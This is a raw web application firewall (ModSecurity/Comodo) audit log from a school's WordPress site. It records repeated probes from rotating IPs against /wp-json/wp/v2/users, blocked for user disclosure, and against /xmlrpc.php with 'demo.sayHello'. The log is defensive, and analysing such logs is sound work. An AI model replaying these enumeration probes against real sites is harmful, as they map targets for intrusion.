Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1377af2e-Z-- --6318691e-A-- [17/May/2025:22:45:23 +0700] aCivE3yxdQCiyU1ENFehEAAAAAo 103.236.140.4 41628 103.236.140.4 8181 --6318691e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.15 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6318691e-C-- demo.sayHello --6318691e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6318691e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496723118447 4806 (- - -) Stopwatch2: 1747496723118447 4806; combined=3779, p1=450, p2=3125, p3=23, p4=24, p5=92, sr=65, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6318691e-Z-- --6c96182d-A-- [17/May/2025:22:46:02 +0700] aCivOnyxdQCiyU1ENFehMAAAAAY 103.236.140.4 41756 103.236.140.4 8181 --6c96182d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6c96182d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c96182d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496762373341 2783 (- - -) Stopwatch2: 1747496762373341 2783; combined=1225, p1=421, p2=774, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c96182d-Z-- --fab17433-A-- [17/May/2025:22:46:13 +0700] aCivRRKi5m5upc8uMd4YKwAAAMs 103.236.140.4 41834 103.236.140.4 8181 --fab17433-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fab17433-C-- demo.sayHello --fab17433-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fab17433-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496773858539 5672 (- - -) Stopwatch2: 1747496773858539 5672; combined=4223, p1=518, p2=3450, p3=35, p4=36, p5=106, sr=75, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fab17433-Z-- --f32aaf7e-A-- [17/May/2025:22:46:14 +0700] aCivRnyxdQCiyU1ENFehMwAAAA4 103.236.140.4 41844 103.236.140.4 8181 --f32aaf7e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f32aaf7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f32aaf7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496774684981 2768 (- - -) Stopwatch2: 1747496774684981 2768; combined=1250, p1=444, p2=775, p3=0, p4=0, p5=30, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f32aaf7e-Z-- --6f62db51-A-- [17/May/2025:22:46:22 +0700] aCivTnyxdQCiyU1ENFehOAAAAAs 103.236.140.4 41866 103.236.140.4 8181 --6f62db51-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.122 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6f62db51-C-- demo.sayHello --6f62db51-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f62db51-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496782580292 6029 (- - -) Stopwatch2: 1747496782580292 6029; combined=4283, p1=540, p2=3513, p3=31, p4=34, p5=97, sr=73, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f62db51-Z-- --67221f57-A-- [17/May/2025:22:46:35 +0700] aCivW3yxdQCiyU1ENFehQAAAAAc 103.236.140.4 41926 103.236.140.4 8181 --67221f57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --67221f57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67221f57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496795310556 2754 (- - -) Stopwatch2: 1747496795310556 2754; combined=1272, p1=409, p2=833, p3=0, p4=0, p5=29, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67221f57-Z-- --cd696d7f-A-- [17/May/2025:22:46:41 +0700] aCivYXyxdQCiyU1ENFehQgAAABM 103.236.140.4 41930 103.236.140.4 8181 --cd696d7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cd696d7f-C-- demo.sayHello --cd696d7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd696d7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496801708485 5271 (- - -) Stopwatch2: 1747496801708485 5271; combined=3985, p1=461, p2=3253, p3=24, p4=86, p5=94, sr=67, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd696d7f-Z-- --4e8e742b-A-- [17/May/2025:22:46:54 +0700] aCivbhKi5m5upc8uMd4YMQAAAM8 103.236.140.4 41978 103.236.140.4 8181 --4e8e742b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4e8e742b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e8e742b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496814706071 2829 (- - -) Stopwatch2: 1747496814706071 2829; combined=1306, p1=430, p2=848, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e8e742b-Z-- --a2fa567a-A-- [17/May/2025:22:46:59 +0700] aCivc3yxdQCiyU1ENFehUgAAAAE 103.236.140.4 42018 103.236.140.4 8181 --a2fa567a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.177 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a2fa567a-C-- demo.sayHello --a2fa567a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2fa567a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496819792036 5752 (- - -) Stopwatch2: 1747496819792036 5752; combined=4228, p1=532, p2=3468, p3=32, p4=35, p5=95, sr=72, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2fa567a-Z-- --91cf3d1f-A-- [17/May/2025:22:47:15 +0700] aCivgxKi5m5upc8uMd4YSQAAAMQ 103.236.140.4 42146 103.236.140.4 8181 --91cf3d1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --91cf3d1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91cf3d1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496835075723 2768 (- - -) Stopwatch2: 1747496835075723 2768; combined=1271, p1=411, p2=832, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91cf3d1f-Z-- --2a79615d-A-- [17/May/2025:22:47:22 +0700] aCivium4kjNN-hEbWjKhaQAAAEE 103.236.140.4 42234 103.236.140.4 8181 --2a79615d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.117 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2a79615d-C-- demo.sayHello --2a79615d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a79615d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496842384721 5569 (- - -) Stopwatch2: 1747496842384721 5569; combined=4121, p1=542, p2=3357, p3=31, p4=35, p5=92, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a79615d-Z-- --61d6c85d-A-- [17/May/2025:22:48:23 +0700] aCivx-m4kjNN-hEbWjKhagAAAFM 103.236.140.4 42350 103.236.140.4 8181 --61d6c85d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --61d6c85d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61d6c85d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496903117545 2904 (- - -) Stopwatch2: 1747496903117545 2904; combined=1298, p1=427, p2=840, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61d6c85d-Z-- --2118a622-A-- [17/May/2025:22:48:30 +0700] aCivzhKi5m5upc8uMd4YagAAANI 103.236.140.4 42360 103.236.140.4 8181 --2118a622-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.225 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2118a622-C-- demo.sayHello --2118a622-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2118a622-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496910816790 5155 (- - -) Stopwatch2: 1747496910816790 5155; combined=3988, p1=478, p2=3278, p3=34, p4=31, p5=97, sr=70, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2118a622-Z-- --c828fa0b-A-- [17/May/2025:22:49:45 +0700] aCiwGXyxdQCiyU1ENFehfgAAAAg 103.236.140.4 42574 103.236.140.4 8181 --c828fa0b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c828fa0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c828fa0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496985279507 2333 (- - -) Stopwatch2: 1747496985279507 2333; combined=1205, p1=392, p2=784, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c828fa0b-Z-- --e56d8278-A-- [17/May/2025:22:49:52 +0700] aCiwIOm4kjNN-hEbWjKhfAAAAEI 103.236.140.4 42654 103.236.140.4 8181 --e56d8278-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.102 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e56d8278-C-- demo.sayHello --e56d8278-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e56d8278-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496992794348 5561 (- - -) Stopwatch2: 1747496992794348 5561; combined=4111, p1=531, p2=3357, p3=31, p4=35, p5=93, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e56d8278-Z-- --4d706706-A-- [17/May/2025:22:50:23 +0700] aCiwPwTOsBn9MSWb6WLR0wAAAJY 103.236.140.4 43032 103.236.140.4 8181 --4d706706-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d706706-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d706706-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497023856101 2748 (- - -) Stopwatch2: 1747497023856101 2748; combined=1239, p1=428, p2=781, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d706706-Z-- --0942261a-A-- [17/May/2025:22:50:32 +0700] aCiwSATOsBn9MSWb6WLR3wAAAJg 103.236.140.4 43092 103.236.140.4 8181 --0942261a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0942261a-C-- demo.sayHello --0942261a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0942261a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s 